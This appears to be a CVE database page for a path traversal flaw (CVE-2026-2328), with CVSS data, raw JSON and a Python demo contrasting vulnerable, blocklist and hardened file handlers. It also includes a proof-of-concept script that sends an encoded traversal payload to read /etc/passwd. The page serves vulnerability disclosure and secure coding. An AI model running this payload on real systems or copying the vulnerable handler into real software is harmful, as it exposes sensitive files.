Security Vulnerability Report

CVE-2026-2328 (CVSS 7.5 HIGH)

Published: 2026-03-30 08:16:17
Last Modified: 2026-03-30 13:26:08
Status: Awaiting Analysis

Description

An unauthenticated remote attacker can exploit insufficient input validation to access backend components beyond their intended scope via path traversal, resulting in exposure of sensitive information.

Weakness: CWE-790 (Improper Filtering of Special Elements)
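The description names only the defect class, so the following Python is added here as an illustration of that pattern; it is not code from the advisory or from the affected product, and the directory layout, file names and handler names are constructed for the example. It puts three file-serving handlers side by side: one that joins the decoded parameter straight onto a base directory (the insufficient validation the description refers to), a blocklist that inspects the raw parameter and therefore misses the URL-encoded "..%2F" form, and a hardened version that decodes, canonicalises and then requires the result to stay inside the base directory.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


def serve_vulnerable(base_dir: str, requested: str) -> bytes:
    """Insufficient input validation: the decoded value is joined straight onto
    base_dir. os.path.join follows "../" segments and, for an absolute path,
    discards base_dir entirely."""
    path = os.path.join(base_dir, unquote(requested))
    with open(path, "rb") as f:
        return f.read()


def serve_blocklist(base_dir: str, requested: str) -> bytes:
    """A common half-fix: reject a literal "../" in the raw parameter, then
    decode. "..%2F" passes the check and becomes "../" after unquote()."""
    if "../" in requested or "..\\" in requested:
        raise PermissionError(f"rejected by blocklist: {requested}")
    return serve_vulnerable(base_dir, requested)


def serve_hardened(base_dir: str, requested: str) -> bytes:
    """Decode first, canonicalise (symlinks and ".." resolved), then require the
    result to remain under the canonical base. relative_to() is used rather than
    a string prefix test so that "/srv/app2" is not accepted as inside "/srv/app"."""
    base = Path(base_dir).resolve()
    candidate = (base / unquote(requested)).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise PermissionError(f"path traversal rejected: {requested}") from None
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate.read_bytes()


def demo() -> dict:
    """Constructed layout: <root>/public is served, <root>/secret.txt is not.
    Returns which handler leaks the secret and whether the hardened handler
    still serves a legitimate file."""
    root = tempfile.mkdtemp(prefix="cve-2026-2328-demo-")
    public = os.path.join(root, "public")
    os.makedirs(public)
    with open(os.path.join(public, "readme.txt"), "w") as f:
        f.write("public content")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash")  # stands in for /etc/passwd

    payload = "..%2Fsecret.txt"  # encoded form, as in the PoC section of this page
    results = {}

    results["vulnerable_leaks"] = b"root:" in serve_vulnerable(public, payload)

    try:
        results["blocklist_leaks"] = b"root:" in serve_blocklist(public, payload)
    except PermissionError:
        results["blocklist_leaks"] = False

    try:
        serve_hardened(public, payload)
        results["hardened_blocks"] = False
    except PermissionError:
        results["hardened_blocks"] = True

    # An absolute path must not escape either: Path(base) / "/etc/passwd" is "/etc/passwd".
    try:
        serve_hardened(public, "%2Fetc%2Fpasswd")
        results["hardened_blocks_absolute"] = False
    except PermissionError:
        results["hardened_blocks_absolute"] = True

    results["hardened_serves_legit"] = serve_hardened(public, "readme.txt") == b"public content"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The order of operations in serve_hardened is the point: decode, then resolve, then compare against a resolved base. Checking the raw string, or comparing before resolving symlinks, leaves one of the two bypasses shown in demo() open.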

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Unknown version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests


def check_path_traversal(url):
    """
    PoC for CVE-2026-2328 Path Traversal Vulnerability
    """
    # Common traversal payload to access /etc/passwd on Linux. The separators
    # are URL-encoded (%2F) so the payload can slip past naive filters that
    # look for a literal "../" before decoding.
    traversal_payload = "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
    # The endpoint and parameter name are placeholders: the advisory does not
    # name the vulnerable component, so adjust them to the target under test.
    target_url = f"{url}/api/v1/resource?file={traversal_payload}"
    try:
        response = requests.get(target_url, timeout=5)
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Vulnerability confirmed! Sensitive data leaked.")
            print(f"[+] Response snippet: {response.text[:100]}")
        else:
            print("[-] Vulnerability not detected or target patched.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    # Replace with the actual target, e.g.: python3 poc.py http://example.com
    target = sys.argv[1] if len(sys.argv) > 1 else "http://example.com"
    check_path_traversal(target)
```

References

https://certvde.com/de/advisories/VDE-2026-010 (CERT@VDE advisory VDE-2026-010)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-2328",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-30T08:16:17.210",
    "lastModified": "2026-03-30T13:26:07.647",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An unauthenticated remote attacker can exploit insufficient input validation to access backend components beyond their intended scope via path traversal, resulting in exposure of sensitive information."
      },
      {
        "lang": "es",
        "value": "Un atacante remoto no autenticado puede explotar una validación de entrada insuficiente para acceder a componentes de backend más allá de su alcance previsto mediante salto de ruta, lo que resulta en la exposición de información sensible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-790"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://certvde.com/de/advisories/VDE-2026-010",
        "source": "[email protected]"
      }
    ]
  }
}
```